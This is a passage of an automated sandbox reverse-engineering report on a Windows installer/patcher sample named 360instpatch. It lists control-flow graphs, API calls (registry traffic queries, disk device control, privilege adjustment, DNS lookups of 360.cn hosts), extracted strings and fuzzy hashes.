6bf0f864-6bf0f888 RegQueryValueExW 329->334 335 6bf0f85c-6bf0f85f 329->335 330->329 332->293 337 6bf0f9b8-6bf0f9c5 call 6bf26f3f 332->337 333->332 339 6bf0f892-6bf0f8b6 RegQueryValueExW 334->339 340 6bf0f88a-6bf0f88d 334->340 335->334 337->293 345 6bf0f8c0-6bf0f8c3 RegCloseKey 339->345 346 6bf0f8b8-6bf0f8bb 339->346 340->339 343->344 347 6bf0fa21-6bf0fa41 call 6bf26f3f call 6bf3ae62 call 6bf26f3f 344->347 348 6bf0fa44-6bf0fa56 344->348 345->289 346->345 347->348 348->200 349 6bf0fa58 348->349 352 6bf0fa61-6bf0fa7c 349->352 353 6bf0fa5a-6bf0fa5f 349->353 355 6bf0fa80-6bf0fa99 call 6bf3ae62 call 6bf26968 352->355 356 6bf0fa7e 352->356 353->200 353->352 355->200 356->355
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF0F4B3
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF0F4BA
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,?,?), ref: 6BF0F573
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6BF0F588
                                                                                                                                                                                                                • Part of subcall function 6BF2D2AB: __EH_prolog3.LIBCMT ref: 6BF2D2B2
                                                                                                                                                                                                                • Part of subcall function 6BF2D2AB: std::runtime_error::runtime_error.LIBCPMT ref: 6BF2D2DB
                                                                                                                                                                                                                • Part of subcall function 6BF2D2AB: __CxxThrowException@8.LIBCMT ref: 6BF2D2F0
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF0F730
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,LastUploadDate,00000000,?,00000000,?,?,?,?), ref: 6BF0F79E
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,LastUploadTime,00000000,?,00000000,?), ref: 6BF0F7CC
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,LastUploadTraffic,00000000,?,00000000,?), ref: 6BF0F7FA
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,LastDownTraffic,00000000,?,00000000,?), ref: 6BF0F828
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,CurUploadTime,00000000,?,00000000,?), ref: 6BF0F856
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,CurUploadTraffic,00000000,?,00000000,?), ref: 6BF0F884
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,CurDownTraffic,00000000,?,00000000,?), ref: 6BF0F8B2
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 6BF0F8C3
                                                                                                                                                                                                              • __time64.LIBCMT ref: 6BF0FA31
                                                                                                                                                                                                              • __time64.LIBCMT ref: 6BF0F653
                                                                                                                                                                                                                • Part of subcall function 6BF3AE62: GetSystemTimeAsFileTime.KERNEL32(6BFCC3F0,?,?,?,6BF0EABC,00000000,?,6BFCC3F0,6BFCC288), ref: 6BF3AE6D
                                                                                                                                                                                                                • Part of subcall function 6BF3AE62: __aulldiv.LIBCMT ref: 6BF3AE8D
                                                                                                                                                                                                              • __time64.LIBCMT ref: 6BF0FA88
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryValue$__time64$CloseH_prolog3Time$CountException@8FileHandleObjectSingleSystemThrowTickWait__aulldiv_memsetstd::runtime_error::runtime_error
                                                                                                                                                                                                              • String ID: CurDownTraffic$CurUploadTime$CurUploadTraffic$LastDownTraffic$LastUploadDate$LastUploadTime$LastUploadTraffic$MaxDnSpeed$MaxUpSpeed$MaxUpUpdate$NonUrgentMode$reg NonUrgentMode:%d$reg NonUrgentMode:%d timeout
                                                                                                                                                                                                              • API String ID: 4167386882-1126348924
                                                                                                                                                                                                              • Opcode ID: 0d1b58e22d42c7f7d36a7813d42600fec161e0a585095352ee593f05628bb5f5
                                                                                                                                                                                                              • Instruction ID: b65351afd0fae905322359a5c42e4bad3aa250b98a4d86d1a4eef8b3a8f7d906
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d1b58e22d42c7f7d36a7813d42600fec161e0a585095352ee593f05628bb5f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8126D72D0020A9FDB54CFA4C9A1AEEB7F9FF45304F10452AE511E7270EB38A949DB64
                                                                                                                                                                                                              Function 6BF3A6BA Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 313COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 575 6bf3a6ba-6bf3a6e2 576 6bf3a6e4-6bf3a703 call 6bf3dc9f call 6bf3dc8c call 6bf38356 575->576 577 6bf3a708-6bf3a70a 575->577 597 6bf3aaee 576->597 577->576 579 6bf3a70c-6bf3a71b call 6bf42b65 577->579 585 6bf3a733-6bf3a738 579->585 586 6bf3a71d-6bf3a72e call 6bf3dc8c call 6bf3dc9f 579->586 587 6bf3a757 call 6bf429d4 585->587 588 6bf3a73a-6bf3a740 585->588 586->597 598 6bf3a75c-6bf3a779 FindFirstFileW 587->598 591 6bf3a742-6bf3a746 588->591 592 6bf3a748-6bf3a755 call 6bf42b52 588->592 591->586 591->592 592->598 603 6bf3aaf1-6bf3aaff call 6bf384d6 597->603 601 6bf3a862-6bf3a86c 598->601 602 6bf3a77f-6bf3a794 call 6bf42b65 598->602 605 6bf3a86e-6bf3a878 601->605 606 6bf3a8cd-6bf3a8d3 601->606 602->586 617 6bf3a796-6bf3a7b6 call 6bf3a65a 602->617 605->606 609 6bf3a87a-6bf3a897 call 6bf42749 605->609 611 6bf3a8e5-6bf3a8fb FileTimeToLocalFileTime 606->611 612 6bf3a8d5-6bf3a8db 606->612 609->586 627 6bf3a89d-6bf3a8a4 609->627 614 6bf3a901-6bf3a917 FileTimeToSystemTime 611->614 615 6bf3aad5-6bf3aae8 GetLastError call 6bf3dcb2 FindClose 611->615 612->611 618 6bf3a8dd-6bf3a8e3 612->618 614->615 619 6bf3a91d-6bf3a95a call 6bf42769 614->619 615->597 634 6bf3a845-6bf3a84b 617->634 635 6bf3a7bc-6bf3a7c6 call 6bf38001 617->635 623 6bf3a95d-6bf3a963 618->623 619->623 625 6bf3a965-6bf3a96b 623->625 626 6bf3a97b-6bf3a991 FileTimeToLocalFileTime 623->626 625->626 631 6bf3a96d-6bf3a979 625->631 626->615 633 6bf3a997-6bf3a9ad FileTimeToSystemTime 626->633 627->586 632 6bf3a8aa-6bf3a8c8 call 6bf41c06 call 6bf41b39 627->632 637 6bf3a9f3-6bf3a9f9 631->637 632->603 633->615 639 6bf3a9b3-6bf3a9f0 call 6bf42769 633->639 634->586 640 6bf3a851-6bf3a85d call 6bf389a5 634->640 649 6bf3a7d1-6bf3a7db GetDriveTypeW 635->649 650 6bf3a7c8-6bf3a7cf call 6bf3a5b9 635->650 644 6bf3aa11-6bf3aa27 FileTimeToLocalFileTime 637->644 645 6bf3a9fb-6bf3aa01 637->645 639->637 640->586 644->615 647 6bf3aa2d-6bf3aa43 FileTimeToSystemTime 644->647 645->644 653 6bf3aa03-6bf3aa0f 645->653 647->615 654 6bf3aa49-6bf3aa86 call 6bf42769 647->654 649->634 656 6bf3a7dd-6bf3a7e3 649->656 650->634 650->649 658 6bf3aa89-6bf3aa8f FindClose 653->658 654->658 662 6bf3a7f1-6bf3a840 call 6bf42769 656->662 663 6bf3a7e5-6bf3a7f0 call 6bf389a5 656->663 661 6bf3aa95-6bf3aad3 call 6bf419da 658->661 661->603 662->661 663->662
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wcspbrk.LIBCMT ref: 6BF3A712
                                                                                                                                                                                                                • Part of subcall function 6BF3DC9F: __getptd_noexit.LIBCMT ref: 6BF3DC9F
                                                                                                                                                                                                                • Part of subcall function 6BF3DC8C: __getptd_noexit.LIBCMT ref: 6BF3DC8C
                                                                                                                                                                                                                • Part of subcall function 6BF38356: __decode_pointer.LIBCMT ref: 6BF38361
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexit$__decode_pointer_wcspbrk
                                                                                                                                                                                                              • String ID: ./\
                                                                                                                                                                                                              • API String ID: 2357261805-3176372042
                                                                                                                                                                                                              • Opcode ID: 88aaf532330191210f0140fc9a7030479d349ff39c575dff9ff329e563e63cdd
                                                                                                                                                                                                              • Instruction ID: b3918ca0e73b74166d0c01065a82c81c9342231f069debf9840ee903ef2d184c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88aaf532330191210f0140fc9a7030479d349ff39c575dff9ff329e563e63cdd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28C134F3804539DADF209F65CC44A9DB7F8BF09714F0041EAE658D2561E7399A80CFA9
                                                                                                                                                                                                              Function 6BEEB3F0 Relevance: 23.2, APIs: 7, Strings: 6, Instructions: 487networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$gethostbynameinet_addr
                                                                                                                                                                                                              • String ID: 127.0.0.1$[DNS_ResolvHost] local resolve [%s] ip:%s$[DNS_ResolvHost] proxy resolve [%s] ip:%s$sd.p.360.cn$st.p.360.cn$tr.p.360.cn
                                                                                                                                                                                                              • API String ID: 771635252-1090227531
                                                                                                                                                                                                              • Opcode ID: a1ec6a9aa073ba1d3ef5c4151e0ce3e1ae934b5bda9eafcad429839ac263f697
                                                                                                                                                                                                              • Instruction ID: 2d53c3f2f00ef5ec3b5126c95bc82daf9b39fd8c4507b14cd8e69d6ba1e858cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1ec6a9aa073ba1d3ef5c4151e0ce3e1ae934b5bda9eafcad429839ac263f697
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8502B172D00705DBDB34CE78D8C0BAA73B9FB45704F200A6DE55686690E739E99ACB31
                                                                                                                                                                                                              Function 6BEE7A1F Relevance: 13.6, APIs: 9, Instructions: 61COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(000200E8,?), ref: 6BEE7A3A
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 6BEE7A41
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE7A4B
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 6BEE7A5B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6BEE7A68
                                                                                                                                                                                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 6BEE7A9C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6BEE7AA9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE7AAF
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6BEE7AB7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle$ErrorLastProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 270471142-0
                                                                                                                                                                                                              • Opcode ID: 54d12814f5e272c9f7efca15d8b34012dcd4cbb24d0f9fa9d91314aed9834ed8
                                                                                                                                                                                                              • Instruction ID: 60d9425859b03c950156ebde5aacc983bf2845aa9dc4bd9aec333e371a0142e8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54d12814f5e272c9f7efca15d8b34012dcd4cbb24d0f9fa9d91314aed9834ed8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87113072910208EFDF40EFA8C848AAFBBB8EB56711B548095F509E2111E734DA4ADB70
                                                                                                                                                                                                              Function 00B92210 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 144fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00B22750: _vswprintf_s.LIBCMT ref: 00B22783
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00B92292
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00B922D8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B922E3
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B92358
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B923D3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle$ControlCreateDeviceFile_memset_vswprintf_s
                                                                                                                                                                                                              • String ID: GenuineIntel:0f8bfbff$\\.\PhysicalDrive%d
                                                                                                                                                                                                              • API String ID: 759969516-2564646230
                                                                                                                                                                                                              • Opcode ID: dede7a64959240cd052320865eedc5a966c0f77dff32e7c560d310935a702aaf
                                                                                                                                                                                                              • Instruction ID: bdd62cda11430a26417ea507855e74659386048f14406c08ca13f14efcc3a900
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dede7a64959240cd052320865eedc5a966c0f77dff32e7c560d310935a702aaf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E51B0B0909340AFD760CF24CC81BABBBE8EB89705F40496DF699D7281E77499058F5B
                                                                                                                                                                                                              Function 00B82158 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B82177
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000038), ref: 00B821BD
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B821DF
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(?,0004D030,?,00000028,?,00000028,?,00000000), ref: 00B82236
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B8226C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000038), ref: 00B822A9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$CloseControlCreateDeviceFileH_prolog3Handle
                                                                                                                                                                                                              • String ID: \\.\PHYSICALDRIVE%d
                                                                                                                                                                                                              • API String ID: 1408917728-613073274
                                                                                                                                                                                                              • Opcode ID: fd75c50ef6adb755a87e45675c3ffb7147e72aea2f356827ecd350597da02336
                                                                                                                                                                                                              • Instruction ID: 1e697555e5cf013a99a4001aa7287d4f5416c7b468e4f52b7a8d9e007455f401
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd75c50ef6adb755a87e45675c3ffb7147e72aea2f356827ecd350597da02336
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14417FB190024CAFDF21EFA4DC46EEE77B8EF48704F00056AF915A7291EB349A05CB50
                                                                                                                                                                                                              Function 6CD3E2B7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74filestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CD3D57F: FindClose.KERNEL32(?,?,6CD3E2C1,?,?,00000000,6CD4DE81,?,?,?,?,?,?,00000034), ref: 6CD3D599
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000034), ref: 6CD3E2E3
                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000034), ref: 6CD3E300
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,00000034), ref: 6CD3E313
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000,6CD4DE81,?,?,?,?,?,?,00000034), ref: 6CD3E31E
                                                                                                                                                                                                              • _wcsrchr.LIBCMT ref: 6CD3E32F
                                                                                                                                                                                                              • _wcsrchr.LIBCMT ref: 6CD3E339
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find_wcsrchr$CloseErrorFileFirstFullLastNamePathlstrlen
                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                              • API String ID: 3086268848-438819550
                                                                                                                                                                                                              • Opcode ID: c67cb2fde4d89d3c98ac2cc17608ab03f6ec0a969a955aacbcc4bf0690b7e7cd
                                                                                                                                                                                                              • Instruction ID: b398e56836c64a7972a4f3bb3afb69803640ef1c30f22b5a9151f5e362c3267e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c67cb2fde4d89d3c98ac2cc17608ab03f6ec0a969a955aacbcc4bf0690b7e7cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A11E2617553249BD3106B714C84B5B32BC9F4734AF041939EA5EDAFE1E770A8048BF4
                                                                                                                                                                                                              Function 00B925D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00B22750: _vswprintf_s.LIBCMT ref: 00B22783
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,00B9335B,?,00000064), ref: 00B92645
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B9267A
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00002710,?,00000000), ref: 00B926A2
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B926BA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B92708
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$CloseControlCreateDeviceFileHandle_vswprintf_s
                                                                                                                                                                                                              • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                                                              • API String ID: 3752575622-2935326385
                                                                                                                                                                                                              • Opcode ID: cab2560c468fec0bdd8a3a2e0ba8467dc8443fced5510f6d97e4fed11af7c318
                                                                                                                                                                                                              • Instruction ID: cb28932883379b66303a534799f414c5691e130b587a82f1438c0843aa35808c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cab2560c468fec0bdd8a3a2e0ba8467dc8443fced5510f6d97e4fed11af7c318
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7418D71504340ABE724DF68DC86EAFB3E8EFC9700F400D6DF59893181EB7499458B62
                                                                                                                                                                                                              Function 6BF321AC Relevance: 9.1, APIs: 6, Instructions: 56networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
